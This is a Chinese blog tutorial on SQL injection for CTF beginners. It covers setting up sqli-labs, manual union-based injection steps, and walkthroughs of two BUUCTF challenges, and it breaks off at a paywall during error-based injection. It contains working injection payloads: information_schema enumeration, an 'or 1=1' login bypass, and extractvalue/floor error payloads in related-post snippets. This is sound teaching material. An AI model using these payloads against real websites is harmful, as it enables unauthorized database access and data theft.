WEB入门——SQL注入(一)

VIP文章 已于 2023-06-03 22:07:07 修改
阅读量1k 收藏 6
点赞数
分类专栏: CTF入门 文章标签: 前端 sql 数据库
于 2023-06-03 18:24:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HasntStartIsOver/article/details/130893102
版权

SQL注入

一、SQL注入的成因

开发人员在开发过程中,直接将URL中的参数、HTTP Body中的Post参数或其他外来的用户输入(如Cookies,UserAgent等)与SQL语句进行拼接,造成待执行的SQL语句可控,从而使我们可以执行任意SQL语句。

二、搭建SQL注入练习平台

  • sqli-labs是一款学习SQL注入的开源平台
  • 下载:https//github.com/skyblueee/sqli-labs-php7
  • 打开phpstady的 www 根目录,解压到根目录下
  • 打开phpMyAdmin 数据库管理工具
  • 在数据库中新建一个security数据库
  • 选择sqli-labs目录中的sql-lab.sql文件,点执行导入到数据库中
  • 打开sqli-labs文件下的sql-connections文件夹中的db-creds.inc文件,修改连接数据库中的密码
    在这里插入图片描述

三、SQL注入分类

3.1 有回显的注入

3.1.1 联合注入

联合注入,表示存在可以使用union关键字进行SQL注入的注入点。
例题:http://localhost/sqli-labs/Less-1/ 源代码中SQL语句部分如下:

<?php
if(isset($_GET['id']))
{
   
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

通过SQL语句中的$id变量,该变量会将GET获取到的参数直接拼接到SQL语句中。如果我们传入参数:

?id=1' union select database() #

那么源代码里面的SQL语就会变成:

$sql="SELECT * FROM users WHERE id='1' union select database() # LIMIT 0,1";

通过传入的单引号闭合前面的单引号,#注释掉后面的语句,中间写上我们需要运行的语句就可以了。

3.1.1.1手动注入一般解题步骤:

  1. 判断网站是否可以进行SQL注入

    • 分别输入不同的id值
    • 有结果:1
    • 有结果:1’ and 1=1#
    • 无结果:1’ and 1=2#

  2. . 依次试一试数据表中有多少列,如果order by 5 报错,则表示有4列。
    ?id=1’ order by 4 #

  3. 查看版本和数据名称 :select 1,2,3…这里根据数据表中的列数来决定参数数量。
    ?id=1’and 1=2 union select 1,version() , database() #

  4. 查看所有数据库:当flag不在当前数据库 可以通过下面的方法查询所有数据库名称,
    ?id=1’and 1=2 union select 1, (select group_concat(schema_name) from information_schema.schemata ) #

  5. 查看数据库中的所有表
    ?id=1’and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 数据库名称) #
    or
    ?id=1’and 1=2 union select 1,(select table_name from information_schema.tables where table_schema = 数据库名称 limit 0,1 ) #

  6. 查看表中的所有字段
    ?id=1’and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 表名) #

  7. 查看字段的所有值
    ?id=1’and 1=2 union select 1,(select 字段名称 from 表名 ) #

关于information_schema:MySQL 中的 information_schema 数据库

3.1.1.2 使用SQLmap工具注入步骤:

参考资料:sqlmap使用教程(超详细)

3.1.1.3 CTF练习
  • [极客大挑战 2019]EasySQL
    在这里插入图片描述
  1. 查看源码,并么有发现SQL语句。尝试弱密码,没有试用出密码。所以尝试注入。
  2. 在BurpSuite中通过Repeater通过手工注入即可得到flag。
    在这里插入图片描述
  • [极客大挑战 2019]LoveSQL
    在这里插入图片描述
  1. 查看源码,没有SQL语句。尝试弱密码登陆也失败了。继续用SQL注入,通过注入username=admin’ or 1=1 #
    在这里插入图片描述
  2. 通过注入可以知道,flag可能藏在了其他数据表中,通过ORDER BY语句查看到该数据表只有3列
    在这里插入图片描述
  3. 使用Union关键字连接两个查询语句,并查询出当前数据库名称:
    在这里插入图片描述
  4. 根据数据库名称查询出所有表名称,使用group_concat()将所有表名连接合并成一个字符串。得到两个数据表名:geekuser和l0ve1ysq1,猜flag可能在l0ve1ysq1表中。
    在这里插入图片描述
  5. 查询l0ve1ysq1表的所有字段名
    在这里插入图片描述
  6. 最后查询表中所有值:得到flag
    在这里插入图片描述

3.1.2 报错注入

3.1.2.1 extractvalue函数

extractevalue函数是对XML文档进行查询的函数。
语法: extractvalue(目标XML文档,XML路径)

mysql> select extractvalue('<div>value</div>','div');
+----------------------------------------+
| extractvalue
最低0.47元/天 解锁文章
HasntStartIsOver
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖到昨天才开始着手准备,时间仓促,能力有限,不到之处请大家批评指正;②我尽量将文中涉及的各种技术原理,专业术语讲的更加通俗易懂,但这个前提是诸位能看得懂基本的SQL语句(想想海璐姐你就懂了);③本晨讲形式为PPT+个人演讲+实际演示,但因为TTS征文限制,少去了很多效果,深表遗憾;④原创文章,达内首发。希望喜欢的同学,多多支持!如有疑问致信:[email protected]大家早上好!今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
SQL注入基础知识
01-18
SQL注入基础知识的学习,可以对你有很大的帮助,避免在开发过程中出现更多的安全问题
webSQL注入
最新发布
observer的博客
03-14 953
[第一章 web入门]SQL注入-1BUUCTF
SQL注入 基础
04-30
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
09-19
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
SQL注入基础和进阶.pdf
12-26
SQL注入基础和进阶
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 4321
题目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
[第一章 web入门]SQL注入-1
陈艺秋的博客
05-28 1242
拿到题目是一篇日记,是GET型请求方式,我们可以直接在url栏中注入数据。页面无回显,判断为字符型注入,闭合符应该就是单引号。判断注入类型,页面有回显所以不是整型注入。查询flag表中的字段名。无回显,说明有三个字段。爆出表名和数据库名称。
[第一章 web入门]SQL注入-1 题目分析与详解
2302_79800344的博客
02-25 834
本题考查SQL注入基础。
Web安全之SQL注入
qq_42751192的博客
06-09 1694
SQL注入SQL lnjection)是发生在 Web 程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至修改数据库。也就是说,SQL 注入就是在用户输入的字符串中添加 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
SQL注入基础.pdf
07-05
介绍SQL注入的原理,常见入侵与防御方式,手工注入或者工具注入
啊D——SQL注入工具
12-01
啊D注入工具
SQL注入基本步骤
weixin_54535828的博客
04-05 6497
一、判断是否可以注入,是何种注入类型(整型,字符型) 举例、 http://xxx/xxx/Less-1/ 输入?id=1 and 1=1 --+正常,输入?id=1 and 1=2 --+报错,可判断为整型注入。 输入?id=1’出现报错,输入?id=1’‘正常,可判断为字符型注入。 总结: 单引号是用来猜测是否存在字符型注入,不加就是猜测是否存在整型注入。 二、判断查询返回了多少个列 判断完整型还是字符型后,去判断有多少列,当输入的列数超过它本来的就会出现报错。 举例、 id=1’ order by 3
Web安全--SQL注入
bobo_milk的博客
11-10 530
floor():id=1' and (select 1 from (select count(*),concat(操作代码,floor(rand(0)*2))x from information_schema.tables group by x)a) --+extractvalue():id=1' union select 1,(extractvalue(1,concat(0x7e,(select 操作代码)))) --+最快的办法就是使用工具跑,可以使用bp的intruder进行爆破字符。
BUUCTF-wp-[第一章 web入门]SQL注入-1
Accompany的博客
11-28 1204
文章目录开始进行注入get基于报错的注入,首先通过order by判断字段名利用union select 联合查询,查询字段确定好位置后,利用union select 联合查询,获取数据库名得到数据库名后进行爆表,得到表名得到表名后进行爆列爆列完成后查看记录 又是一个小小的分享,display() 进入页面后使用最经典的单引号判断法返回与id=1时不同的错误信息,便可以得知此题存在sql注入 然后通过如下操作可判断其是个字符型注入 此处的判断对于此题有点冗余,两种注入的差别并不大 id=1%27%20a
Web安全----SQL注入
m0_49420271的博客
11-27 1934
时至今日,SQL注入仍是广大渗透爱好者聚焦的攻击方式,每四年更新一次的OWASP TOP 10【链接:link】都能够看到它的身影。今天,很荣幸和大家一起来探讨研究学习SQL注入的一些内容,如有不合适或者不正确的地方,欢迎大家留言。
[第一章 web入门]sql注入-1
06-28
### 回答1: SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL语句被执行。为了防止SQL注入攻击,开发人员需要对用户输入的数据进行严格的过滤和验证,同时使用参数化查询等技术来防止SQL注入攻击。 ### 回答2: SQL注入攻击是指攻击者通过把恶意的SQL语句插入到应用程序输入数据中的方法,来实现非法操作或篡改数据的一种攻击技术。攻击者利用SQL注入漏洞可以获取敏感数据,改变数据库中的数据,甚至完全控制应用程序。 攻击者利用SQL注入漏洞,可以通过几种方法来实现攻击。以下是一些常见的SQL注入攻击方式: 1.基于错误的注入:攻击者可以通过注入恶意SQL语句,导致应用程序出现错误或异常,从而获得应用程序内部的敏感数据。 2.盲注注入:攻击者可以通过注入语句,来获取数据库信息,如数据库版本,或者判断SQL查询的结果是否正确。 3.联合查询注入:攻击者可以通过在注入语句中添加SELECT语句,来获取敏感数据或执行一些非法操作。 SQL注入攻击作为一种常见的网络攻击方式,需要我们在开发过程中加强对应用程序输入数据进行过滤和检查,以防止SQL注入漏洞。以下是一些预防SQL注入攻击的方法: 1.使用参数化查询:应用程序可以使用参数化查询语句,通过绑定参数来保证输入数据不会被作为SQL语句的一部分执行。 2.限制用户输入:应用程序可以限制用户输入的字符集合,或对用户输入的内容进行验证和过滤。 3.对于敏感数据,可以使用加密等措施来保证数据的安全性。 总之,应用程序开发者需要认识到SQL注入攻击的威胁,并在开发过程中采取一些预防措施来保证应用程序的安全性。 ### 回答3: SQL注入是一种常见的网络攻击方式,旨在通过在输入框或者URL中注入SQL代码,以达到破坏或者获取数据库数据的目的。SQL注入可以通过输入合法的SQL语句来实现,或者通过输入特定的字符来执行恶意代码。 SQL注入攻击的原理在于,攻击者在输入框或者URL中输入包含SQL关键词的字符,这些字符会被解释成SQL命令执行,并且会以其余参数的身份执行,这意味着该攻击可以以管理员的身份执行,且能获取数据库的全部数据。 SQL注入攻击的表现可以是网站遭到入侵或者数据库中数据突然消失或者受到修改。为了防止SQL注入攻击,应该首先排除参数化输入的漏洞,即对于用户输入的数据需要进行过滤,过滤掉控制字符,即可有效地防止SQL注入攻击。 总之,SQL注入攻击是一种网络安全威胁,要防范此类攻击,网站管理者应当在网站上做好安全措施,确保用户输入的数据进行有效的过滤和检查以保证安全性。同时,网站用户也应避免输入不必要的信息和暴露个人隐私等信息,以避免成为攻击者的目标。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值